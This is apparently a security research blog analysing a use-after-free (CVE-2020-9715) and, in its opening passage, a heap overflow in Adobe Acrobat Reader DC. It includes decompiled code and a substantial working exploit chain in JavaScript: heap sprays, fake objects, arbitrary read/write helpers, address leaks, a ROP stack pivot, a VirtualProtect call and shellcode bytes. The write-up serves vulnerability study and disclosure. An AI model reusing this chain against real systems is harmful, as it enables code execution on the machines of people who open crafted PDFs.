Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.
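
The size calculation is the same one used when preparing the heap layout. A small sketch, using the metadata sizes stated above and a hypothetical helper name arrayBufferLengthFor, shows both results.

```javascript
const ARRAYBUFFER_HEADER = 0x10; // ArrayBuffer metadata, as stated above
const CHUNK_HEADER = 0x8;        // busy heap chunk metadata, as stated above

// Length to request so that the whole chunk has the desired total size.
function arrayBufferLengthFor(chunkSize) {
  return chunkSize - ARRAYBUFFER_HEADER - CHUNK_HEADER;
}

const sprayLength = arrayBufferLengthFor(0x10000); // heap spray allocations
const layoutLength = arrayBufferLengthFor(0x2608); // heap layout allocations

console.log(sprayLength.toString(16), layoutLength.toString(16));
```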

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

The purpose of these allocations is to have a controllable memory region at the address where the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page where the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

[5]

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] prepares the contents of the relocated stack, so that everything is ready once the stack pivot is executed. In particular, at [3] the address of the shellcode and the parameters to VirtualProtect are written. The address of the shellcode is placed where VirtualProtect expects its return address, so the ret instruction at the end of VirtualProtect redirects the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and check out our other blog posts!

Analysis of a use-after-free Vulnerability in Adobe Acrobat Reader DC

By Sergi Martinez

This post analyses CVE-2020-9715, a use-after-free vulnerability affecting several versions of the Adobe Acrobat and Adobe Acrobat Reader products. The vulnerability was discovered by Mark Vincent Yason, who reported it to the Zero Day Initiative (ZDI) disclosure program.

This research was inspired by a detailed blog post by ZDI that analyzed the vulnerability. This post broadly follows the exploitation steps outlined in the ZDI blog post, but describes the vulnerability and the exploitation steps in more detail.

Overview

A use-after-free vulnerability affects the data ESObject cache within the EScript.api module of Adobe Acrobat Reader DC. Although objects may be added to the cache using keys with ANSI or Unicode strings, objects are evicted from the cache by keys that contain only Unicode strings. This enables an attacker to cause a data ESObject to be freed while its pointer remains intact in the object cache entry. When the same JavaScript object is later accessed, its cache entry is found despite the corresponding data ESObject having been freed. This leads to a use-after-free condition. An attacker can exploit this vulnerability to achieve code execution by enticing a user to open a crafted PDF file.

The vulnerability analysis that follows is based on Adobe Acrobat Reader DC version 2020.009.20063 running on Windows 10 64-bit.

CVE-2020-9715

Before we dive into the vulnerability, we need to understand how embedded JavaScript is handled by Adobe Reader.

Adobe Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

The Adobe Reader JavaScript engine uses several types of objects including ESObjects and JSObjects. ESObjects are internal to the EScript.api module and contain a pointer to the classical JavaScript objects, JSObjects.

Several kinds of ESObjects exist and among them is the data ESObject, which is a type of object used to represent embedded files and data streams. data ESObjects are uniquely identified by a key (referred to as cache_key in this post) that contains:

  • A pointer to a PDDoc object, which is an object that represents the PDF document.
  • The name of the data ESObject, which is an ANSI or Unicode string containing the name of the embedded file.

References to data ESObjects are stored in a cache indexed by cache_key. When a new data ESObject is constructed with a certain name, a cache_key object is constructed with that name and is used to search the cache for the presence of the data ESObject that matches the name. If the search is a cache hit, a pointer to the data ESObject is returned. Otherwise, a new data ESObject is created and stored in the cache, and a pointer to it is returned.

The vulnerability occurs due to a mismatch in the encoding of the name string during the construction of cache_key used in the insertion and deletion phases in the lifecycle of a data ESObject. When a data ESObject is created and added to the cache, the name used in the cache_key retains the original encoding (ANSI or Unicode) found in the PDF document.

When a data ESObject is deleted from the cache, the name used in the cache_key is always encoded in Unicode. This leads to a condition where cache entries for data ESObjects with ANSI names are never purged from the cache; instead, the cache entries retain pointers to freed data ESObjects indefinitely.

If an ANSI data ESObject is thus freed, and the code tries to create a new data ESObject with a matching name (e.g., when JavaScript code deletes this.dataObjects[0] and then accesses this.dataObjects[0]), a cache hit occurs but the pointer returned is the pointer to the ANSI-named data ESObject that was previously freed. This leads to an exploitable use-after-free condition.

Code Analysis

Let's take a look at how these objects are represented under the hood, and examine where the bug exists. Code listings show decompiled C code; source code is not available for the affected product. Structure definitions, function names, etc. are obtained by reverse engineering and may not accurately reflect those defined in the source code.

Structure Definitions

The cache mechanism is implemented with the use of a variant of Binary Search Trees. A pointer to the cache is kept in a global variable at EScript+0x273AAC, which points to a structure (named here as esobject_cache_st) defined as follows:

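/* Forward declarations so the members below can reference these types. */
typedef struct bst_node_st  bst_node;
typedef struct cache_key_st cache_key;

typedef struct esobject_cache_st {
  bst_node *root_node;
  int      *node_count;
  void     *unknown;
} esobject_cache;

struct bst_node_st {
  bst_node  *left;
  bst_node  *parent;
  bst_node  *right;
  int       node_type;
  cache_key *key;
  void      *esobject;
};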

A pointer to the cache_key structure is stored within each node in the cache. The cache_key structure is defined as follows:

typedef struct cache_key_st {
  void *pddoc;
  ESString *name;
} cache_key;

The cache_key structure contains the name of the embedded file in the form of an ESString structure, which is defined as follows:

typedef struct esstring_st {
  int  type;
  char *buffer;
  int  len;
  int  max_capacity;
  void *unknown1;
  void *unknown2;
} ESString;

In the structure above, the buffer member is a pointer to the string encoded in the format specified in the type member (1 for ANSI, 2 for Unicode). Its length is defined by the len member and the maximum capacity of the buffer is indicated by max_capacity. In Unicode ESString objects the buffer encoding is UTF-16 with Byte Order Mark (BOM).
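To make the difference between the two buffer encodings concrete, the sketch below encodes the same name both ways. The helper names are hypothetical, and the big-endian byte order (BOM bytes FE FF) is an assumption of this example; the text above only states that a BOM is present.

```javascript
// Sketch: the same name as ANSI bytes and as UTF-16 with a BOM.
// Big-endian byte order (BOM FE FF) is an assumption of this example.
function encodeAnsi(name) {
    // One byte per character; assumes every code unit is below 0x100.
    return Uint8Array.from(name, (ch) => ch.charCodeAt(0) & 0xff);
}

function encodeUtf16WithBom(name) {
    const out = new Uint8Array(2 + name.length * 2);
    out[0] = 0xfe;
    out[1] = 0xff;
    for (let i = 0; i < name.length; i++) {
        const unit = name.charCodeAt(i);
        out[2 + i * 2] = unit >> 8;   // high byte first
        out[3 + i * 2] = unit & 0xff; // then low byte
    }
    return out;
}

const toHex = (bytes) =>
    Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join(" ");

console.log(toHex(encodeAnsi("a.txt")));         // 61 2e 74 78 74
console.log(toHex(encodeUtf16WithBom("a.txt"))); // fe ff 00 61 00 2e 00 74 00 78 00 74
```

The two buffers describe the same file name but differ in both length and content, so any comparison that takes the type or the raw bytes into account treats them as different strings.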

Comparing Cache Keys

Any operation that requires traversing the tree requires a key comparison function. This function is implemented at EScript+0x90770 and its code is listed below.

bool is_key_greater(cache_key *key1, cache_key *key2)
{
  ESString *name1;
  ESString *name2;

[1]

  /* Keys from different documents are ordered by their PDDoc pointer. */
  if ( key1->pddoc != key2->pddoc )
    return (unsigned int)key1->pddoc < (unsigned int)key2->pddoc;
  /* Same document: fall back to comparing the ESString names. */
  name2 = key2->name;
  name1 = key1->name;
  return esstrings_compare(&name1, &name2);
}

The function first checks whether the keys belong to the same PDF document [1]. If they belong to the same PDF document then it proceeds to compare the names of the keys, which are ESString objects.

The ESString comparison function (implemented at EScript+0x45B07) is listed below.

bool esstrings_compare(ESString **name1, ESString **name2)
{
  ESString *type1;
  ESString *type2;
  bool v4;

  type1 = get_ESString_type(*name1);
  type2 = get_ESString_type(*name2);

[2]

  if ( type1 == type2 )
    v4 = (sub_23845B5E(*name1, *name2) & 0x8000u) != 0;
  else
    v4 = (int)type1 < (int)type2;
  return v4;
}

Relevant to this vulnerability is that at [2] there is a check that compares the ESString types. If they differ, the result of the function is true if type1 is less than type2. For example, when comparing two keys with the same name of different types where type1 is ANSI (1) and type2 is Unicode (2), the esstrings_compare function returns true.

When performing a lookup in the data ESObject cache, the function that implements it (EScript+0x90476) considers keys with the same name but different ESString types as different.
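The effect of this ordering can be modelled in a few lines. The sketch below is a simplified model, not the decompiled code: the field names are illustrative, and it assumes the tree treats two keys as the same entry only when neither orders before the other, which is how ordered trees usually define equality.

```javascript
const ANSI = 1, UNICODE = 2;

// Model of the comparison described above: document first, then string type, then name.
function keyLess(a, b) {
    if (a.pddoc !== b.pddoc) return a.pddoc < b.pddoc;
    if (a.type !== b.type) return a.type < b.type;
    return a.name < b.name;
}

// Assumption: two keys match only if neither orders before the other.
function keysEquivalent(a, b) {
    return !keyLess(a, b) && !keyLess(b, a);
}

const ansiKey = { pddoc: 1, type: ANSI, name: "a.txt" };
const unicodeKey = { pddoc: 1, type: UNICODE, name: "a.txt" };

console.log(keyLess(ansiKey, unicodeKey));            // true
console.log(keysEquivalent(ansiKey, unicodeKey));     // false
console.log(keysEquivalent(ansiKey, { ...ansiKey })); // true
```

In this model an ANSI key and a Unicode key with the same name never match, which is the property the rest of the analysis relies on.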

Deleting Cache Entries

When a data ESObject is freed, the corresponding cache entry that stores a pointer to the object is also freed. The ESObject deletion is implemented in the function at EScript+0x907B0, which is listed below.

__int16 delete_object(int a1)
{
  int v1;
  ESString *v2;
  wchar_t *v3;
  wchar_t *v4;
  esobject_cache *cache_ptr;
  cache_key key;
  int v8[3];
  int v9;

  v1 = sub_23858B70(a1);

[1]

  v2 = (ESString *)sub_23844B00(a1, "DataObject");
  v3 = (wchar_t *)v2;
  if ( v1 )
  {
    if ( !v2 )
      return 1;
    v4 = (wchar_t *)get_dataobject_name(v2);
    v8[0] = (int)v4;
    v9 = 0;
    key.pddoc = (void *)v1;
    sub_23877D42(&key.name, (ESString **)v8);
    LOBYTE(v9) = 1;
    cache_ptr = initialize_data_esobject_cache(global_cache_ptr);

[2]

    remove_key_from_cache(cache_ptr, &key);
    LOBYTE(v9) = 2;
    if ( key.name )
      sub_23845AAE((wchar_t *)key.name);
    v9 = 3;
    if ( v4 )
      sub_23845AAE(v4);
    v9 = -1;
  }
  if ( v3 )
    sub_23845AAE(v3);
  return 1;
}

The call at [1] returns a pointer to an ESString object used to create the cache_key object. This is passed to the function that removes cache nodes matching the cache_key object at [2].

The vulnerability occurs because [1] returns a pointer to an ESString object whose type is always Unicode (ESString.type = 2). However, the ESString value of the keys stored in the cache nodes keeps the type that was used in the definition of the data object in the PDF file. If that name was defined as an ANSI string in the PDF file, the cache key would also be ANSI (ESString.type = 1).

A lookup for a cache entry whose name was defined with an ANSI ESString never succeeds during deletion, since the cache key created for the lookup is always a Unicode ESString. This prevents the cache node from being removed, leaving a stale pointer to the corresponding ESObject, which has been freed.
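The lifecycle problem can be reproduced in a toy model. The class below is a hypothetical illustration written for this post, not Adobe's implementation: it uses a Map instead of a tree and a freed flag instead of real memory management, but it inserts with the original encoding and deletes with a Unicode key as described above.

```javascript
const ANSI = 1, UNICODE = 2;

// Toy model of the cache lifecycle; not Adobe's implementation.
class ToyCache {
    constructor() {
        this.entries = new Map();
    }

    static keyOf(pddoc, type, name) {
        return `${pddoc}|${type}|${name}`;
    }

    // Insertion keeps the encoding found in the document.
    getOrCreate(pddoc, type, name) {
        const k = ToyCache.keyOf(pddoc, type, name);
        if (!this.entries.has(k)) {
            this.entries.set(k, { name, freed: false });
        }
        return this.entries.get(k);
    }

    // Deletion always builds a Unicode key, mirroring the behaviour described above.
    release(pddoc, obj) {
        obj.freed = true; // the object itself is freed regardless of the cache
        return this.entries.delete(ToyCache.keyOf(pddoc, UNICODE, obj.name));
    }
}

const cache = new ToyCache();
const first = cache.getOrCreate(1, ANSI, "a.txt");
const removed = cache.release(1, first);
const second = cache.getOrCreate(1, ANSI, "a.txt");

console.log(removed);          // false: the ANSI entry was not found
console.log(second === first); // true: the stale entry is returned
console.log(second.freed);     // true: it refers to a freed object
```

In a memory-safe language the stale entry is only a flagged object; in the native code the same situation yields a dangling pointer.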

Accessing Deleted Objects

When the data ESObject cache contains entries that were not removed due to the ESString type mismatch problem, any attempt to access the freed object from JavaScript retrieves the stale pointer corresponding to that entry. Therefore, any operation on that pointer causes an access to memory that was already freed, triggering the use-after-free.

The function listed below handles accesses to data ESObjects and is implemented at EScript+0x929F0.

__int16 accessDataObjects(int a1, int a2, int a3)
{
  wchar_t *v3;
  int v5;
  int v6;
  int v7;
  ESString *v8;
  int v9;
  bool v10;
  wchar_t *v11;
  int v12;
  int freed_object_retrieved;
  int v14;
  int v15[3];
  wchar_t *v16;
  wchar_t *v17;
  wchar_t *v18;
  int v19;
  int v20;

  v3 = (wchar_t *)sub_23858B70(a1);
  v16 = v3;
  if ( !v3 )
    return sub_238AB500(a1, a2, 0, 14, 0);
  v17 = (wchar_t *)sub_238401C0((int *)a1);
  v5 = sub_2387DC8A(v3, v14);
  v6 = v5;
  v7 = 0;
  if ( v5 )
    v18 = (wchar_t *)custom_calloc(v5, 4);
  else
    v18 = 0;
  v8 = new_esstring(0, 1);
  v15[2] = (int)v8;
  v20 = 0;
  v9 = 0;
  v19 = 0;
  v10 = v6 == 0;
  if ( v6 > 0 )
  {
    v11 = v18;
    _mm_lfence();
    do
    {
      sub_2387DB6D(v16, v9, (int)v8);
      v12 = sub_2383D040(v17, 1);
      *(_DWORD *)&v11[2 * v19] = v12;
      v15[0] = (int)v16;

[1]

      v15[1] = get_ESString_buffer(v8);

[2]

      freed_object_retrieved = sub_23882310(v17, "Data", (wchar_t *)v15);

[3]

      sub_2383D430(*(int **)&v11[2 * v19], freed_object_retrieved);
      v9 = v19 + 1;
      v19 = v9;
    }
    while ( v9 < v6 );
    v7 = 0;
    v10 = v6 == 0;
  }
  if ( !v10 )
    v7 = sub_2385CE40(v17, v18, v6, 1);
  sub_2383D430((int *)a3, v7);
  if ( v6 )
    (*(void (__cdecl **)(wchar_t *))(dword_23A7538C + 12))(v18);
  v20 = 1;
  if ( v8 )
    sub_23845AAE((wchar_t *)v8);
  return 1;
}

The call at [2] triggers the creation of data ESObjects based on the data object name retrieved at [1]. This causes a cache lookup that returns the ESObject pointer of the corresponding cache entry, which is then used in the call at [3].

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. The following exploit is designed for Adobe Acrobat Reader DC version 2020.009.20063 running on Windows 10 x64.

A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)

In order to bypass all three mitigations, the following exploitation strategy is adopted:

  1. Spray a large number of ArrayBuffer objects with the correct size so they are adjacent to each other. The sprayed ArrayBuffer objects must contain a crafted fake Array object that is used to corrupt the adjacent ArrayBuffer.byteLength field (step 6).
  2. Prime the Low Fragmentation Heap (LFH) for size 0x48 (the size of the freed ESObject).
  3. Create and free the target ESObject.
  4. Spray crafted strings to allocate memory in the address used by the freed ESObject. The crafted string must contain a pointer to a predictable address where one of the fake Array objects created in step 1 would be.
  5. Trigger the ESObject reuse to obtain a handle to the fake Array in the exploit JavaScript code.
  6. Use the fake Array handle obtained in step 5 to write past the underlying ArrayBuffer boundaries and overwrite the byteLength field of the adjacent ArrayBuffer with the value 0xffffffff. This, combined with the creation of a DataView object on the corrupted ArrayBuffer allows reading from and writing to arbitrary memory addresses.
  7. Use the arbitrary read and write to write the ROP chain and shellcode.
  8. Overwrite a function pointer of the fake Array object and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Spraying ArrayBuffer Objects

When dealing with the heap, the addresses of allocations are not consistent between executions and thus cannot be hardcoded into the exploit. In order to place controlled memory regions at predictable addresses, the internals of the memory manager have to be leveraged.

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get a heap allocation of the right size, the metadata of ArrayBuffer objects and heap chunks has to be taken into consideration. The internal representation of ArrayBuffer objects shows that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

var SHIFT_ALIGNMENT = 4;
var FAKE_ARRAY_JSOBJ_ADDR = 0x40000058 + SHIFT_ALIGNMENT;
var HEAP_SEGMENT_SIZE = 0x10000
var ARRAY_BUFFER_SZ = HEAP_SEGMENT_SIZE-0x10-0x8

[1]

var arrayBufferSpray = new Array(0x8000);

function sprayArrayBuffers() {

    // Spray a large number of ArrayBuffers containing crafted data (a fake array)
    // so we end up with a fake JS array object at FAKE_ARRAY_JSOBJ_ADDR

    for (var i = 0; i < arrayBufferSpray.length; i++) {
        arrayBufferSpray[i] = new ArrayBuffer(ARRAY_BUFFER_SZ);
        var dv = new DataView(arrayBufferSpray[i]);


[2]

        // ArrayObject.shape_
        dv.setUint32(SHIFT_ALIGNMENT+0, FAKE_ARRAY_JSOBJ_ADDR+0x10, true);

        // ArrayObject.type_
        dv.setUint32(SHIFT_ALIGNMENT+4, FAKE_ARRAY_JSOBJ_ADDR+0x40, true);

        // ArrayObject.elements_
        dv.setUint32(SHIFT_ALIGNMENT+0xc, FAKE_ARRAY_JSOBJ_ADDR+0x80, true);

        // ArrayObject.shape_.base_
        dv.setUint32(SHIFT_ALIGNMENT+0x10, FAKE_ARRAY_JSOBJ_ADDR+0x20, true);

        // ArrayObject.shape_.base_.flags
        dv.setUint32(SHIFT_ALIGNMENT+0x20+0x10, 0x1000, true);

        // ArrayObject.type_.classp
        dv.setUint32(SHIFT_ALIGNMENT+0x40, FAKE_ARRAY_JSOBJ_ADDR+0x40+0x10, true);

        // ArrayObject.type_.classp.enumerate
        dv.setUint32(SHIFT_ALIGNMENT+0x40+0x10+0x1c, 0xdead1337, true);

        // ArrayObject.elements_.flags
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10, 0, true);

        // ArrayObject.elements_.initializedLength
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+4, 0xffff, true);

        // ArrayObject.elements_.capacity
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+8, 0xffff, true);

        // ArrayObject.elements_.length
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+0xc, 0xffff, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the FAKE_ARRAY_JSOBJ_ADDR global variable.

Each of the sprayed ArrayBuffer objects contains a crafted fake Array object [2]. To craft a fake Array object, not all the internal structures need to be provided. However, there are some important values that need to be chosen carefully:

  • Elements.initializedLength: The number of elements that have been initialized.
  • Elements.capacity: The number of allocated slots.
  • Elements.length: The length property of Array objects.

When the use-after-free condition is triggered, operations on the crafted Array object (placed in the contents of the sprayed ArrayBuffer objects) include reading from and writing to the Array. The eventual goal is to corrupt the byteLength field of an ArrayBuffer object, which is a well-known method of obtaining a read and write primitive. If the crafted Array object allows writing past the boundaries of the underlying ArrayBuffer object and into an adjacent ArrayBuffer, the adjacent ArrayBuffer can be corrupted as needed. Therefore, the values of these Array properties must be large enough for the Array to span the bytes that separate the start of its elements from the metadata of the next ArrayBuffer.

Priming the Low Fragmentation Heap

The size of the object that is freed in this vulnerability is 0x48 bytes (the size of an ESObject). Allocations of this size are likely to end up being handled by the Low Fragmentation Heap (LFH) if enough consecutive allocations of that size are performed.

To allocate into the address of the freed ESObject, it helps to make sure that the object is handled by the LFH, which reduces the chance of the application making an uncontrolled allocation into that spot.

var lfhPrime = new Array(0x1000);

function primeLFH() {

    // Activate the LFH bucket for size 0x48 (real chunk size is 0x50) and help improve determinism.
    // We want the allocation of the UAFed object to fall in the LFH so we can claim its freed chunk more or less reliably.

[1]

    var baseString = "Prime the LFH!".repeat(100);
    for (var i = 0; i < lfhPrime.length; i++) {
        lfhPrime[i] = baseString.substring(0, 0x48 / 2 - 1).toUpperCase();
    }

[2]

    for (var i = 0; i < lfhPrime.length; i+=2) {
        lfhPrime[i] = null;
    }
}

The function listed above performs multiple allocations of size 0x48 [1] in order to activate the LFH bucket for that size. Activating the LFH for a specific size requires at least 0x11 consecutive allocations. However, since the application might require allocations of that specific size for other uses, some of the allocations are freed to reduce the possibility of it allocating into the freed ESObject spot [2].
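The substring length used in the listing follows from the target allocation size. The sketch below reproduces that arithmetic; it assumes the engine stores each string as 2-byte UTF-16 code units followed by a 2-byte terminator, and the helper name is illustrative.

```javascript
const TARGET_CHUNK_BYTES = 0x48;               // size of the freed ESObject
const charCount = TARGET_CHUNK_BYTES / 2 - 1;  // characters requested via substring()

// Assumption: 2 bytes per UTF-16 code unit plus a 2-byte terminator.
function stringAllocationBytes(str) {
    return (str.length + 1) * 2;
}

const sample = "Prime the LFH!".repeat(100).substring(0, charCount);

console.log(sample.length);                              // 35
console.log(stringAllocationBytes(sample).toString(16)); // 48
```

Under that assumption a 35-character string occupies exactly 0x48 bytes, so each string falls into the same size class as the ESObject.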

Creating and Freeing the Vulnerable Object

Once the memory is laid out, the ESObject has to be created, added into the cache, and then freed.

[1]

this.dataObjects[0].toString();

[2]

this.dataObjects[0] = null;

[3]

g_timeout = app.setTimeOut("triggerUAF()", 1000);

In the code listing above, [1] triggers the creation of the data ESObject that is stored in the object cache. Then, [2] removes the reference to it so when the Garbage Collector is triggered in [3] the ESObject is freed.

Allocating Into the Freed Spot

At this point the heap has been curated for allocation into the freed ESObject spot. To do so, a large number of allocations of size 0x48 have to be performed in order to have a chance of one landing into that spot.

[1]

var stringSpray = new Array(0x2000);

function sprayStrings() {
    // Spray strings of size 0x48/2-1 in order to eventually allocate into the spot left by the freed chunk
    var baseString = unescape(toUnescape(FAKE_ARRAY_JSOBJ_ADDR).repeat(0x48));
    for (var i = 0; i < stringSpray.length; i++) {
        stringSpray[i] = baseString.substring(0, 0x48 / 2 - 1).toLowerCase();
    }
}

The allocations are performed with a spray of the size defined at [1]. This size is twice the size selected for priming the LFH, to make sure that both the free spots left by the priming and the ESObject spot are filled.

The object used in the spray is a string, as it allows easy control of the size and contents without any metadata overhead. The content of the string is the unescaped value of the address where a fake Array object is expected to have been allocated during the initial ArrayBuffer spray. The unescape function is used to deal with Unicode transformation.

Achieving Arbitrary Read and Write

Once the predictable address occupies the spot in memory left by the freed ESObject and points to the fake Array object, an access to the data object provides a handle to that fake Array object that can be used as a normal Array. This can be achieved with the following line of code:

var fakeArrObj = this.dataObjects[0]

By carefully choosing the element of the fake Array to assign a value to, the adjacent ArrayBuffer can be corrupted. The interesting value to corrupt is the byteLength property. Following the byteLength field, the next value in memory is a pointer to the DataView object associated with the ArrayBuffer. It is important to take into account that this value can only be either a valid pointer or zero.

function getArbitraryRW(fakeArrObj) {
    var corruptedArrayBuffer = null;

[1]

    var nextABByteLengthOffset = ARRAY_BUFFER_SZ-0x10-0x70+0x8;
    fakeArrObj[nextABByteLengthOffset / 8] = 2.12199579047120666927013567069E-314;

[2]

    fakeArrObj[0] = this.addField("t", "text", 0, [0, 0, 0, 0 ]);
    fakeArrObj[0].value = "dummy1337w00t";

[3]

    for (var i = 0; i < arrayBufferSpray.length; i++) {
        if (arrayBufferSpray[i].byteLength == -1) {
            corruptedArrayBuffer = arrayBufferSpray[i];
        }
    }

[4]

    return new DataView(corruptedArrayBuffer);
}

In the code listing above, the byteLength value of the adjacent ArrayBuffer object is overwritten [1]. The double value used translates to 0xFFFFFFFF 0x00000000 in memory due to the IEEE 754 representation for double values.
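The mapping between that double and its in-memory bytes can be verified independently. The sketch below uses a standard DataView with an explicit little-endian flag; the function name is illustrative.

```javascript
// Split a double into its two little-endian 32-bit halves.
function doubleToDwords(value) {
    const dv = new DataView(new ArrayBuffer(8));
    dv.setFloat64(0, value, true);
    return [dv.getUint32(0, true), dv.getUint32(4, true)];
}

const [low, high] = doubleToDwords(2.12199579047120666927013567069E-314);

console.log(low.toString(16));  // ffffffff
console.log(high.toString(16)); // 0
```

The low dword lands on the byteLength field and the zero high dword lands on the value that follows it, which satisfies the requirement that the DataView pointer be either valid or zero.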

Aside from the ArrayBuffer corruption, a text field is created and assigned to the fake Array [2]. This is later used to leak a pointer to the AcroForm.api module, which is used to leak the icucnv58.dll module base address.

The next step is to locate the corrupted ArrayBuffer by checking the size of all the allocated buffers [3]. Finally, creating a DataView on the corrupted ArrayBuffer [4] allows reading from and writing to arbitrary memory addresses, since the size of the ArrayBuffer was set to 0xffffffff. However, the addresses specified when reading or writing memory are relative to the address where the corrupted ArrayBuffer is located. For convenience, the following helper functions were created to read and write memory using absolute addresses.

function readUint32(dataView, absoluteAddress) {
    var startAddr = FAKE_ARRAY_JSOBJ_ADDR-SHIFT_ALIGNMENT+HEAP_SEGMENT_SIZE;
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var startAddr = FAKE_ARRAY_JSOBJ_ADDR-SHIFT_ALIGNMENT+HEAP_SEGMENT_SIZE;
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}
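The offset translation performed by both helpers can be isolated into a pure function and checked with plain numbers. The function name is illustrative, and the base address is the value that FAKE_ARRAY_JSOBJ_ADDR-SHIFT_ALIGNMENT+HEAP_SEGMENT_SIZE evaluates to with the constants defined earlier.

```javascript
// Convert an absolute 32-bit address into an offset relative to the buffer data,
// wrapping around the 32-bit address space for addresses below the buffer.
function toRelativeOffset(absoluteAddress, bufferDataAddress) {
    let offset = absoluteAddress - bufferDataAddress;
    if (offset < 0) {
        offset += 0x100000000;
    }
    return offset;
}

const base = 0x4000005c - 4 + 0x10000; // 0x40010058

console.log(toRelativeOffset(0x40010060, base).toString(16)); // 8
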